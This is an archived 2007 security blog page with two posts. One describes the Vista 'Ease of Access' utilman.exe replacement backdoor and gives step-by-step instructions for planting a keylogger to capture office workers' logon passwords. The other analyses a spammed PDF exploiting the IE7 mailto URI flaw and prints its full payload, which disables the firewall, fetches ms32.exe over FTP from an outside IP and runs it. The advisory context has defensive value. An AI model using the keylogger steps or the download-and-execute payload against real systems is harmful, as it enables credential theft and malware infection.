Archives

All posts for the month November, 2007

Windows Vista’s backdoor method works by exploiting the “Ease of Access” button at the bottom left of the Windows Vista Logon screen. Normally when the icon is clicked we get a choice of options such as Narrator, Magnifier, etc.

The way to exploit this is by replacing any one of the files with your own executable and calling it the same name. Say if magnify.exe was replaced with cmd.exe then selecting the magnify option would bring up the console window.

Obviously in order to replace such windows files you will first need to logon to the system with admin rights, take ownership of the file and then replace the file with with one of your own.

If you ever forgot your local logon password you could use this backdoor method and reset the password or connect to a remote share and copy your files over.

The choices of files you can modify to get the backdoor working are:
magnify.exe, narrator.exe, osk.exe or utilman.exe

The utilman.exe is the main executable that brings up the Ease of Access window which references the rest of the executables.

If you wanted to capture someone’s logon credentials, normally even with local admin rights to the box, majority key logging tools do not intercept keystrokes at the ctrl+alt+del stage whether the tool has been loaded up at boot as a service or as a program.

This backdoor method works a treat in an office environment for capturing  passwords.

1. Remotely connect to a desktop machine
2. Replace a file say utilman.exe with your key logger
3. Walk upto the desk and click on the “ease of access” button

Now just wait for the user to logon to capture the credentials :). Once logged in the key logger terminates.

The Windows function GetAsyncKeyState() is all it takes to design a key logger and is the easiest option.

One solution to mitigate the risk would be to make sure the utilman.exe executable does not get replaced or executed. Various products on the market will be able to lock it down.

Reference:

http://www.computerperformance.co.uk/vista/vista_backdoor_logon.htm

This is an interesting vulnerability first got published at the end of July 2007 but really brought to light at the end of October 2007. Spammers exploited this vulnerability by sending a specially crafted URI (Uniform Resource Identifier) containing a “%” character and ending with a certain extension (e.g. “.bat” or “.cmd”).

Internet Explorer 7 on Windows XP or Server 2003 changes the way Windows handles URIs. This change had introduced a flaw that can caused Windows to incorrectly determine the appropriate handler for the protocol specified in a URI.

In other words an input validation error within the handling of URIs with registered URI handlers.
(e.g. “mailto”, “news”, “nntp”, “snews”, “telnet”, and “http”).

Adobe Reader and Firefox were to name a few which was used as an attack vector to exploit this vulnerability.

One such malicious PDF file which was spammed out was called “report.pdf” and was only 3,919 bytes in size. Below is the embedded code located within the PDF file

<</URI(mailto:%/../../../../../../windows/system32/cmd”.exe”” /c /q
\”@netsh firewall set opmode mode=disable&@echo o 203.121.69.116>7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7&@ftp -s:7 -v -A>nul&@del /q 7&@start ms32.exe&\” \”&\” “con.cmd)/S/URI>>

As we can see how the remote code execution was beautifully crafted.

Here are the steps it takes:

1. netsh firewall set opmode mode=disable
   – disables the windows firewall.
2. echo o 203.121.69.116>7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7
   – creates a script which will be used by ftp, script called here is 7
3. ftp -s:7 -v -A>nul
   – runs the script via ftp which downloads the malware called ms32.exe
4. del /q 7
   – deletes the script
5. start ms32.exe
   – finally executes the malware ms32.exe
6. GAMEOVER 🙂

McAfee AV detects the malware as Exploit-PDF
Sophos AV detects the malware as W32/PDF-URI.L
Symantec AV detects the malware as Bloodhound.Exploit.163

Updates for Adobe and Firefox had been released which mitigated this vulnerability.

Microsoft had finally released an update on the 13th of November updating the shell32.dll library which handles the URIs.

References:

http://secunia.com/advisories/26201/
http://www.kb.cert.org/vuls/id/403150/
http://www.us-cert.gov/cas/techalerts/TA07-297B.html
http://vil.nai.com/vil/content/v_139103.htm
http://www.f-secure.com/v-descs/exploit_w32_pdf-uri_l.shtml
http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2007-102318-0451-99&tabid=1
http://www.microsoft.com/technet/security/advisory/943521.mspx
http://www.microsoft.com/technet/security/Bulletin/MS07-061.mspx